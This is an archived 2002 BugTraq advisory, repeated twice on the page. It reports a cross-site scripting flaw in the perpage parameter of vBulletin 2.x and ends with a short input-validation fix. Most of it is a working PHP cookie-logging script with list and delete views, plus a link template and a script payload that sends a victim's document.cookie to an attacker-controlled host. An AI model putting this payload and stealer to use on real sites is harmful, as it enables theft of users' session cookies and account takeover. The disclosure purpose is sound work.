BugTraq
Back to list
|
Post reply
vBulletin XSS Injection Vulnerability
Nov 23 2002 11:13PM
Sp.IC (SpeedICNet Hotmail Com)
.:: vBulletin XSS Injection Vulnerability
vBulletin is a powerful and widely used bulletin board system, based on
PHP language and MySQL database. I discovered lately a Cross-Site
Scripting issue that would allow attackers to inject maleficent codes
into the pages and execute it on the clients browser.
+ Vulnerable Versions:
- Jelsoft vBulletin 2.2.9 Candidate.
- Jelsoft vBulletin 2.2.8.
- Jelsoft vBulletin 2.2.7.
- Jelsoft vBulletin 2.2.6.
- Jelsoft vBulletin 2.2.5.
- Jelsoft vBulletin 2.2.4.
- Jelsoft vBulletin 2.2.3.
- Jelsoft vBulletin 2.2.2.
- Jelsoft vBulletin 2.2.1.
- Jelsoft vBulletin 2.2.0.
- Jelsoft vBulletin 2.0.2.
- Jelsoft vBulletin 2.0.1.
- Jelsoft vBulletin 2.0.0.
+ Details:
At "Start View Threads" block in member2.php, there is a variable
[$perpage] controls the way of reciting subscribed threads, therefore an
integer value [Which refers to the number of threads that will be
displayed each page] should be assigned for the variable. However, we
should realise that the value of this variable is added to a query that
will fetch records from the database, so if a client gave a wrong value
to $perpage, the script will output an error message [Due to script
doesn't checks on inputs and filter it], printing the query and revealing
its mistake.
+ Exploit:
- Run this script on some host:
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet (at) Hotmail (dot) Com [email concealed]).
// Descrption: Fetching vBulletin's cookies and storing it into a
log file.
// Variables:
$LogFile = "Cookies.Log";
// Functions:
/*
If ($HTTP_GET_VARS['Action'] = "Log") {
$Header = "<!--";
$Footer = "--->";
}
Else {
$Header = "";
$Footer = "";
}
Print ($Header);
*/
Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet (at) Hotmail (dot) Com [email concealed]\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ($Footer);
*/
Switch ($HTTP_GET_VARS['Action']) {
Case "Log":
$Data = $HTTP_GET_VARS['Cookie'];
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D,
StrLen (DecHex (MD5 (NULL))))));
$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);
Print ("<Meta HTTP-Equiv=\"Refresh\"
Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists ($LogFile) || !In_Array ($Records)) {
Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
$Records = Array_UniQue (File ($LogFile));
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("? Logged Records : <B>" . Count (File
($LogFile)) . "</B>\n");
Print ("? Listed Records : <B>" . Count
($Records) . " </B>[Not Counting Duplicates]\n");
Print ("\n");
Print ("<B>.:: Options</B>\n");
Print ("\n");
If (Count (File ($LogFile)) > 0) {
$Link['Download'] = "[<A Href=\"" .
$LogFile . "\">Download</A>]";
}
Else{
$Link['Download'] = "[No Records in Log]";
}
Print ("? Download Log : " . $Link
['Download'] . "\n");
Print ("? Clear Records : [<A Href=\"" .
$SCRIPT_PATH . "?Action=Delete\">Y</A>]\n");
Print ("\n");
Print ("<B>.:: Records</B>\n");
Print ("\n");
While (List ($Line[0], $Line[1]) = Each ($Records)) {
Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
}
}
Print ("</Pre>");
Break;
Case "Delete":
@UnLink ($LogFile);
Print ("<Br><Br><B>Deleted
Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete
Log</B></Center></Pre>");
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
}
?>
- Give a victim this link: member2.php?s=[Session]
&action=viewsubscription&perpage=[Script Code]
- Note: You can replace [Script Code] with: --
><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+
(document.cookie);</Script>
- Then go to Http://[Exploit Path]?Action=List
+ Solution:
- Under [ // set defaults ] on line 304, paste this code:
If (IsSet ($perpage) && $perpage != Is_Int($perpage)) {
$perpage = IntVal ($perpage);
}
+ Links:
- Http://www.vBulletin.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
.:: vBulletin XSS Injection Vulnerability
vBulletin is a powerful and widely used bulletin board system, based on
PHP language and MySQL database. I discovered lately a Cross-Site
Scripting issue that would allow attackers to inject maleficent codes
into the pages and execute it on the clients browser.
+ Vulnerable Versions:
- Jelsoft vBulletin 2.2.9 Candidate.
- Jelsoft vBulletin 2.2.8.
- Jelsoft vBulletin 2.2.7.
- Jelsoft vBulletin 2.2.6.
- Jelsoft vBulletin 2.2.5.
- Jelsoft vBulletin 2.2.4.
- Jelsoft vBulletin 2.2.3.
- Jelsoft vBulletin 2.2.2.
- Jelsoft vBulletin 2.2.1.
- Jelsoft vBulletin 2.2.0.
- Jelsoft vBulletin 2.0.2.
- Jelsoft vBulletin 2.0.1.
- Jelsoft vBulletin 2.0.0.
+ Details:
At "Start View Threads" block in member2.php, there is a variable
[$perpage] controls the way of reciting subscribed threads, therefore an
integer value [Which refers to the number of threads that will be
displayed each page] should be assigned for the variable. However, we
should realise that the value of this variable is added to a query that
will fetch records from the database, so if a client gave a wrong value
to $perpage, the script will output an error message [Due to script
doesn't checks on inputs and filter it], printing the query and revealing
its mistake.
+ Exploit:
- Run this script on some host:
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet (at) Hotmail (dot) Com [email concealed]).
// Descrption: Fetching vBulletin's cookies and storing it into a
log file.
// Variables:
$LogFile = "Cookies.Log";
// Functions:
/*
If ($HTTP_GET_VARS['Action'] = "Log") {
$Header = "<!--";
$Footer = "--->";
}
Else {
$Header = "";
$Footer = "";
}
Print ($Header);
*/
Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet (at) Hotmail (dot) Com [email concealed]\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ($Footer);
*/
Switch ($HTTP_GET_VARS['Action']) {
Case "Log":
$Data = $HTTP_GET_VARS['Cookie'];
$Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D,
StrLen (DecHex (MD5 (NULL))))));
$Log = FOpen ($LogFile, "a+");
FWrite ($Log, Trim ($Data) . "\n");
FClose ($Log);
Print ("<Meta HTTP-Equiv=\"Refresh\"
Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
Case "List":
If (!File_Exists ($LogFile) || !In_Array ($Records)) {
Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
$Records = Array_UniQue (File ($LogFile));
Print ("<Pre>");
Print ("<B>.:: Statics</B>\n");
Print ("\n");
Print ("? Logged Records : <B>" . Count (File
($LogFile)) . "</B>\n");
Print ("? Listed Records : <B>" . Count
($Records) . " </B>[Not Counting Duplicates]\n");
Print ("\n");
Print ("<B>.:: Options</B>\n");
Print ("\n");
If (Count (File ($LogFile)) > 0) {
$Link['Download'] = "[<A Href=\"" .
$LogFile . "\">Download</A>]";
}
Else{
$Link['Download'] = "[No Records in Log]";
}
Print ("? Download Log : " . $Link
['Download'] . "\n");
Print ("? Clear Records : [<A Href=\"" .
$SCRIPT_PATH . "?Action=Delete\">Y</A>]\n");
Print ("\n");
Print ("<B>.:: Records</B>\n");
Print ("\n");
While (List ($Line[0], $Line[1]) = Each ($Records)) {
Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
}
}
Print ("</Pre>");
Break;
Case "Delete":
@UnLink ($LogFile);
Print ("<Br><Br><B>Deleted
Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete
Log</B></Center></Pre>");
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
$HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
Break;
}
?>
- Give a victim this link: member2.php?s=[Session]
&action=viewsubscription&perpage=[Script Code]
- Note: You can replace [Script Code] with: --
><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+
(document.cookie);</Script>
- Then go to Http://[Exploit Path]?Action=List
+ Solution:
- Under [ // set defaults ] on line 304, paste this code:
If (IsSet ($perpage) && $perpage != Is_Int($perpage)) {
$perpage = IntVal ($perpage);
}
+ Links:
- Http://www.vBulletin.com
[ reply ]